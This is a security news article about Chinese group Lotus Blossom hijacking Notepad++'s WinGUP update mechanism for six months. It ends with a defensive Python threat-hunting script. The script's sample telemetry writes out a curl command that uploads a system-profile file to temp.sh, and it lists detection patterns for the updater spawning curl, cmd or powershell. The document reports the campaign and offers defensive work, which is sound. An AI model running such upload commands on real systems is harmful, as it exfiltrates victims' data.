Notepad++ Update Mechanism Hijacked in Six-Month Chinese Espionage Campaign: A Deep Dive

How Chinese APT Lotus Blossom turned Notepad++'s trusted update system into a precision espionage tool for six months without detection.

From The Bit Baker Daily Briefing — February 8, 2026

Six months. That's how long one of the world's most widely installed text editors was quietly ferrying espionage payloads to carefully chosen government targets across Southeast Asia — and nobody caught it. The attackers didn't find some clever zero-day in Notepad++ itself. They went after something far more dangerous: the trust infrastructure between the software and the people who rely on it.

Chinese state-sponsored group Lotus Blossom (also tracked as Billbug and Chrysalis) hijacked Notepad++'s WinGUP update mechanism by seizing control of the shared hosting server responsible for distributing updates. Between June and December 2025, the group surgically pushed trojanized NSIS installers to targets in Vietnam, the Philippines, El Salvador, and Australia. Their toolkit was comprehensive — Cobalt Strike Beacons, sideloaded DLLs (log.dll), and Metasploit downloaders — everything needed for persistent access and quiet data theft.

The truly unsettling part? Selectivity. Notepad++ has north of 10 million active installations. The overwhelming majority of those users got perfectly clean updates the entire time. Only machines matching specific targeting criteria received the weaponized versions. That surgical precision is exactly what made this campaign so hard to spot through automated detection.

Why It Matters

Supply chain attacks have become a recurring nightmare, but the craft behind this one deserves close attention. SolarWinds in 2020 showed the world what a compromised update pipeline could do at scale. The 3CX incident in 2023 proved communications software was just as vulnerable. Now Notepad++ — a humble, almost universally trusted text editor — joins that list. No application is too small or too simple to become a delivery vehicle when the distribution layer is the target.

The geographic footprint is telling. Vietnam, the Philippines, Australia — all nations with deep strategic stakes in the South China Sea and the wider Indo-Pacific. El Salvador is the outlier, though financial or diplomatic intelligence collection would explain its presence. The operators weren't casting a wide net. Government agencies and financial institutions were the marks, not random endpoints. This was old-school espionage with a modern wrapper.

I think what makes this genuinely frightening is the irony at the center of it. Security teams drill the same message endlessly: patch your software, accept updates, stay current. Here, the organizations that followed that advice most diligently were the ones who got burned.

What's Under the Hood

The attack unfolded in carefully sequenced stages. First, the operators compromised the shared hosting server behind Notepad++ updates — handing them the keys to the entire download pipeline. From that position, they tampered with the WinGUP auto-updater so it would serve malicious NSIS installers that, to any user watching the process, looked entirely normal.

Before dropping heavy payloads, the attackers ran reconnaissance. AutoUpdater.exe and embedded Lua scripts fingerprinted victim machines, deciding whether each target was worth pursuing. Exfiltrated profiling data went out through curl.exe to temp.sh, a temporary file-sharing service — a smart choice that kept command-and-control traffic looking like mundane web activity. Only after confirming a machine's intelligence value did the operators escalate: Cobalt Strike Beacons for persistent C2, sideloaded DLLs to survive reboots, Metasploit downloaders as a fallback if primary channels got disrupted.

Selective delivery was the campaign's survival mechanism. By refusing to trigger indiscriminately, the operators dodged the mass anomaly signals that eventually unraveled SolarWinds. A security vendor scanning Notepad++ updates during this window would have pulled clean files every time — unless they happened to be operating from inside a targeted network. Clever and infuriating in equal measure.

Notepad++ shipped v8.9.1 in response, introducing XML signature validation for updates. Published IoCs from Rapid7, Kaspersky, and Orca Security cover file hashes, C2 domains, and behavioral indicators tied to the Cobalt Strike and Metasploit payloads.

What to Watch

  • How the open-source ecosystem absorbs the lesson. If a project as prominent as Notepad++ — millions of users, active development — was exposed through shared hosting, smaller projects running on tighter budgets face even steeper odds. Expect growing pressure for mandatory code signing, reproducible builds, and dedicated distribution infrastructure.
  • Whether other WinGUP-dependent applications got caught in the blast. WinGUP is a generic update framework, not exclusive to Notepad++. If the hosting compromise reached beyond a single distribution path, the scope of damage may be wider than anyone currently realizes.
  • The forensic timeline and its implications. Six months of dwell time is an eternity. Organizations in targeted regions need to conduct retrospective threat hunts using the published indicators — compromise could predate the public disclosure by months, and lateral movement may already be deeply embedded in affected networks.
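An added example, not code from the article or from the Notepad++ project: a small retrospective hunt over constructed endpoint telemetry for the behaviours described under "What's Under the Hood" and called for in the last bullet above (the updater spawning curl.exe, uploads to temp.sh, and log.dll loaded from a user-writable directory). AutoUpdater.exe, curl.exe, temp.sh and log.dll come from the article; every file path, the GUP.exe name, and the cmd.exe/powershell.exe child-process list are assumptions.

```python
# Retrospective threat hunt over endpoint telemetry for the behaviours this
# article attributes to the campaign: the updater spawning curl.exe, uploads
# to temp.sh, and a sideloaded log.dll loaded from a non-system directory.
import re
# Constructed sample events (not real logs), modelled on Sysmon-style fields.
EVENTS = [
    {"type": "process", "host": "ws01",
     "parent": r"C:\Program Files\Notepad++\updater\AutoUpdater.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": 'curl.exe -F "file=@C:\\Users\\Public\\sysinfo.txt" https://temp.sh/upload'},
    {"type": "process", "host": "ws02",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe https://example.org/readme.txt -o readme.txt"},
    {"type": "imageload", "host": "ws01",
     "image": r"C:\Users\alice\AppData\Local\Temp\update\viewer.exe",
     "loaded": r"C:\Users\alice\AppData\Local\Temp\update\log.dll"},
    {"type": "imageload", "host": "ws03",
     "image": r"C:\Program Files\Notepad++\notepad++.exe",
     "loaded": r"C:\Windows\System32\kernel32.dll"},
]
FILE_SHARING = re.compile(r"https?://(?:[\w-]+\.)?temp\.sh\b", re.I)  # temp.sh is from the article
UPDATER_NAMES = {"autoupdater.exe", "gup.exe"}  # article's name; GUP.exe is WinGUP's usual binary
SUSPECT_CHILDREN = {"curl.exe", "cmd.exe", "powershell.exe"}  # curl.exe from article; rest assumed
SIDELOAD_DLLS = {"log.dll"}  # from the article
TRUSTED_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")  # assumed allow-list

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def hunt(events):
    """Return (host, rule, detail) tuples for events matching the described TTPs."""
    hits = []
    for ev in events:
        if ev["type"] == "process":
            parent, child = basename(ev["parent"]), basename(ev["image"])
            # Profiling data shipped out via curl.exe to a temporary file-sharing host.
            if child == "curl.exe" and FILE_SHARING.search(ev["cmdline"]):
                hits.append((ev["host"], "curl_upload_to_tempsh", ev["cmdline"]))
            # The updater should launch an installer, not a downloader or shell.
            if parent in UPDATER_NAMES and child in SUSPECT_CHILDREN:
                hits.append((ev["host"], "updater_spawned_lolbin", ev["image"]))
        elif ev["type"] == "imageload":
            dll = ev["loaded"]
            # A DLL with the campaign's name loaded from outside the system directories.
            if basename(dll) in SIDELOAD_DLLS and not dll.lower().startswith(TRUSTED_DLL_DIRS):
                hits.append((ev["host"], "suspect_dll_sideload", dll))
    return hits

if __name__ == "__main__":
    for host, rule, detail in hunt(EVENTS):
        print(f"{host}\t{rule}\t{detail}")
```

Swap EVENTS for parsed process-creation and image-load records from your own EDR or Sysmon export, and treat any hit as a starting point for scoping, not as confirmation on its own.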
